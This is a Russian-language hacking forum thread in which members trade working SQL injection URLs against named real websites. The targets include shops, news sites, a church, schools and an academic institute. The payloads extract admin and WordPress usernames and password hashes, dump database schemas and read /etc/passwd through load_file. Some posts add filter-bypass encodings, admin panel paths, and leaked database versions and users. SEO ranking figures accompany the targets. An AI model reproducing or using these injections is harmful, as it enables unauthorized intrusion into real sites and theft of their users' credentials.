SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    336
    Likes Received:
    177
    Reputations:
    75
    Небольшая подборка.

    PHP:
    http://www.conciergequestionnaire.com/ur_here/story.php?id=-196+union+select+concat_ws(0x03a,table_schema,table_name,column_name),2,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns --
    PHP:
    http://www.gumblossombabies.com/item.php?itemid=-1+union+select+1,2,3,4,5,load_file('/etc/passwd'),7--
    PHP:
    http://qiyuangh.g.178.com/main.php?act=charactorlist&user_id=1+and+extractvalue(rand(),concat(0x3a,(select+concat(0x3a,table_name)+from+information_schema.tables+limit+0,1)))
    PHP:
    https://www.nensa.net/calendar/index.html?id=-1252+union+select+1,2,concat_ws(0x03a,ID,user_login,user_pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+nensa_forum.wp_users--
    PHP:
    http://pazoogle.com/grafton-hills/Admin/getFile.php?db=sites&table=siteMediaFiles&fileId=-411'+/*!union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13*/--+h
     
    3 people like this.
  2. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    916
    Likes Received:
    461
    Reputations:
    722
    Скулю 10 года пофиксили, но нарастили пузомерки и открыли новые доступы (=
    Яндекс тИЦ: 100
    Page Rank: 4
    Яндекс Каталог: True
    PHP:
    http://www.magniflex.ru/shop/checkout2.php?id=3+AND+extractvalue(1,user())+--+
     
    _________________________
  3. StaD

    StaD New Member

    Joined:
    18 Mar 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    SQL 4.1.22 => таблицы подбираем
    Code:
    http://tvpc.com/Channel.php?ChannelID=1+UNION+SELECT+1,2,ChannelID,4,5,ChannelPassword,7,version(),9+from+Channels+LIMIT+0,1
     
  4. StaD

    StaD New Member

    Joined:
    18 Mar 2012
    Messages:
    4
    Likes Received:
    1
    Reputations:
    0
    Таблицы:
    Code:
    http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,TABLE_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.TABLES+--
    Колонки:
    Code:
    http://www.price62.ru/newsorg/?year=-1)+UNION+SELECT+1,2,COLUMN_NAME,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x...+--
     
  5. bodrich

    bodrich Member

    Joined:
    9 Jan 2012
    Messages:
    22
    Likes Received:
    7
    Reputations:
    0
    20к траффика
    http://www.zavarka.ru/texts/cgi-bin/show.cgi?id=1+union+select+1,version(),3,4,5,6,7,8+--+
    админка /admin/admin.php
     
  6. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    296
    Likes Received:
    46
    Reputations:
    21
    PR3 AR516,938
    fitnetj3_websitefitnetj3_admin@localhost5.1.63-community-log
     
  7. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    1,091
    Likes Received:
    526
    Reputations:
    173
    Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.
     
    #15107 OxoTnik, 19 Aug 2012
    Last edited: 19 Aug 2012
  8. .Varius

    .Varius Elder - Старейшина

    Joined:
    5 May 2009
    Messages:
    623
    Likes Received:
    289
    Reputations:
    42
    http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%2d%2d%20%31​

    pеtеrhost обходится полным urlencode запроса

    http://www.sprusk.spb.ru/index.php?page_id=4+%61%6e%64%20%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%34%2c%35%2c%63%6f%6e%63%61%74%5f%77%73%28%30%78%33%61%2c%75%73%65%72%6e%61%6d%65%2c%75%73%65%72%5f%70%61%73%73%77%6f%72%64%29%2c%37%2c%38%2c%39%2c%30%2c%31%2c%32%2c%33%20%66%72%6f%6d%20%70%68%70%62%62%5f%75%73%65%72%73%20%6c%69%6d%69%74%20%31%2c%31%2d%2d%20%31​
     
    2 people like this.
  9. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    296
    Likes Received:
    46
    Reputations:
    21
    PHP:
    http://www.revistaklan.com/material.php?id=-1074%27+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17--+f
    ТИЦ-10(R2) PR-5 AR-811,760DMOZ
     
    1 person likes this.
  10. sql.inject

    sql.inject New Member

    Joined:
    20 Aug 2012
    Messages:
    3
    Likes Received:
    3
    Reputations:
    5
    Интернет магазин техники - NewComp. Админы были поставлены в известность, но никакой реакции.

    Login:

    Code:
    http://new comp.dp.ua/ ?d=-1+union+select+login+fr om+users+--+
    Password:

    Code:
    http://new comp.dp.ua/ ?d=-1+union+select+password+fr om+users+--+
     
    1 person likes this.
  11. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    964
    Likes Received:
    307
    Reputations:
    51
    offtop:
    sql.inject, http://netfaq.ru/mysql-book/concat_ws
     
    3 people like this.
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    336
    Likes Received:
    177
    Reputations:
    75
    PR == 6; ТИЦ == 1200; DMOZ, ЯK == true;

    PHP:
    http://www.mi.ras.ru/index.php?l=1&c=1'+union+select+1,2,3,4,load_file('/etc/passwd')--+h
    PR == 2;

    PHP:
    http://www.ibanklive.com/index.php?page=contact_us_existing_03&mode=contact&ticket_id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6 --
    TИЦ && PR == N/A;

    PHP:
    http://video.newlifechurch.org/podcast/index.php?pid=-11+union+select+1,file_priv,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user --
    http://video.newlifechurch.org/info.php
     
    2 people like this.
  13. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    105
    Likes Received:
    78
    Reputations:
    40
    Асток-Пресс. Санкт-Петербургская рекламно-информационная газета.

    Code:
    http://astok-press.ru/index.php?section=news.php&news_id=1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
    Database Version: 5.1.51-community-log
    Database name: tmp_astok
    User name: tmp_astok@localhost

    ТИЦ: 240
    PR: 4


    Авторский сайт Соболевой Ольги. Методики обучения детей.

    Code:
    http://www.metodika.ru/bookitem.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7,8,9,10,11,12,13--
    Вывод в title.

    Database Version: 5.0.51a-3ubuntu5
    Database name: bi78
    User name: bi78-sql@localhost

    ТИЦ: 300
    PR: 4


    Dead Hackers Society.

    Code:
    http://dhs.nu/news.php?t=single&ID=1-1.1+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    Database Version: 5.1.63-0+squeeze1
    Database name: ae
    User name: ae@localhost

    ТИЦ: 0
    PR: 4


    Украинский женский сайт.

    Code:
    http://ladys.in.ua/index.php?page=4&cat=4&sled=800&enda=820&bl=1&num=1+UNION+SELECT+1,2,3,4,5,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User())--
    Database Version: 5.1.60
    Database name: oleg_ladys
    User name: oleg_ladys@localhost

    ТИЦ: 0
    PR: 0
     
    #15113 HellFire, 26 Aug 2012
    Last edited: 26 Aug 2012
    2 people like this.
  14. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    296
    Likes Received:
    46
    Reputations:
    21
    Code:
    http://www.coorslightpr.com/event.php?id=-28+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
    ТИЦ0
    PR4
    AR6,313,469
     
  15. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    303
    Likes Received:
    23
    Reputations:
    6

    PR=6DMOZ
    AR=289917
    5.1.52-log



    PR=6
    AR=421004
    4.1.22-standard-log
     
    #15115 AppS, 28 Aug 2012
    Last edited: 28 Aug 2012
    1 person likes this.
  16. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    Slanger.ru — Словарь молодежного, компьютерного и другого сленга и жаргона

    http://slanger.ru/?mode=library&r_id=-9%20union%20select%201,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6,7--

    5.1.58-log slangerru@localhost slangerru pc-linux-gnu
     
    2 people like this.
  17. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    296
    Likes Received:
    46
    Reputations:
    21
    PHP:
    http://www.aldeburghsuffolk.com/promotion.php?id=-14/**/union/**/select/**/1,2,3,4,5,6,7,concat_ws(user(),database(),version()),9--
    PR2
    web91-abaweb91-aba@localhost5.1.57-log

    PHP:
    http://www.cherry-italy.com/en/promotion.php?page=&id=-34/**/union/**/select/**/1,concat_ws(user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15--
    PR1
    chitaly_webchitaly_web@localhost5.1.54
     
  18. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    140
    Likes Received:
    40
    Reputations:
    26
    pr8
    google: 7 080 000
     
    2 people like this.
  19. DyukiN

    DyukiN Banned

    Joined:
    10 Jul 2011
    Messages:
    296
    Likes Received:
    46
    Reputations:
    21
    Code:
    http://www.buypc.ru/promo.php?id=-10/**/union/**/select/**/1,2,3,concat_ws(user(),database(),version()),5,6
    Тиц 10
    testroot@zvm4.host.ru4.0.27

    Code:
    http://centralparkjakarta.com/v2/promo.php?st=5&id=-478%27+union+select+1,2,group_concat(admin_id,0x03a,username,0x03a,password),4,5,6,7,8+from+admin--+f
    PR5
     
    1 person likes this.
  20. sql.inject

    sql.inject New Member

    Joined:
    20 Aug 2012
    Messages:
    3
    Likes Received:
    3
    Reputations:
    5
    PR == 6, ТиЦ == 0


    Code:
    http://www.npvideo.com/channel.php?id=-1 '+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14+from+wp_users+--+

    PR == 4, ТиЦ == 0

    Code:
    http://www.yna.edu/5771_shabbaton.php?id=-1'+union+select+1,group_concat (column_name+separator+0x3a),3,4,5+from+information_schema.columns+where+table_name='users'+--+

    PR == 4, ТиЦ == 0

    Code:
    http://www.bostonhigashi.org/about.php?id=-1+union+select+1,2,concat_ws (0x3a3a,database(),version(),user())+--+

    PR == 3, ТиЦ == 10

    Code:
    http://av tech.uz/detailed?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,username,password),16,17,18,19,20,21,22,23,24,25,26+from+users+limit+1,1+--+

    PR == 0, ТиЦ == 0

    Code:
    http://www.neo group.uz/news.php?id=-6'+union+select+1,concat_ws(0x3a,log,pas5),3,4+from+administrators+--+
     
    #15120 sql.inject, 30 Aug 2012
    Last edited: 31 Aug 2012
    2 people like this.
Loading...
Thread Status:
Not open for further replies.